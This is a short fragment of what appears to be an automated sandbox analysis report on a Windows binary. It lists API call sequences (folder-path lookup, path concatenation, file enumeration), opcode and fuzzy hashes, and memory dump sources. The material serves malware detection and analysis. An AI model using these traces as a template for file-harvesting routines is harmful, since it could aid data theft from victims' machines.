                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 4aa1137ca4ab0d025deca313c096eef7067b0fc431d41cb3dab29450851791cc
                              • Instruction ID: 4cc6c0933a45b50f9c89d76287e0631317194f9c84bfb40e9430849b3f5f8c90
                              • Opcode Fuzzy Hash: 4aa1137ca4ab0d025deca313c096eef7067b0fc431d41cb3dab29450851791cc
                              • Instruction Fuzzy Hash: F6F09032900204FFD726BBB8580BB4E33A06F82721F244349F404A61D3CB6C59409F96
                              APIs
                                • Part of subcall function 007A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007A8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 007A4F7A
                              • lstrcat.KERNEL32(?,007B1070), ref: 007A4F97
                              • lstrcat.KERNEL32(?,014C9190), ref: 007A4FAB
                              • lstrcat.KERNEL32(?,007B1074), ref: 007A4FBD
                                • Part of subcall function 007A4910: wsprintfA.USER32 ref: 007A492C
                                • Part of subcall function 007A4910: FindFirstFileA.KERNEL32(?,?), ref: 007A4943
                                • Part of subcall function 007A4910: StrCmpCA.SHLWAPI(?,007B0FDC), ref: 007A4971
                                • Part of subcall function 007A4910: StrCmpCA.SHLWAPI(?,007B0FE0), ref: 007A4987
                                • Part of subcall function 007A4910: FindNextFileA.KERNEL32(000000FF,?), ref: 007A4B7D
                                • Part of subcall function 007A4910: FindClose.KERNEL32(000000FF), ref: 007A4B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 9f3b30d38bbc5af83a991fe5401f7228685181a36fea3782df04be56ce5086cc
                              • Instruction ID: 28b93fb1be299041fab0ca1c93b267186c2d7a683738a3177627b8dfa75dc277
                              • Opcode Fuzzy Hash: 9f3b30d38bbc5af83a991fe5401f7228685181a36fea3782df04be56ce5086cc
                              • Instruction Fuzzy Hash: 1F210DB6954204EBC754FBB0EC4AFEE333CA795300F404545B64952181EE78AAD8DB93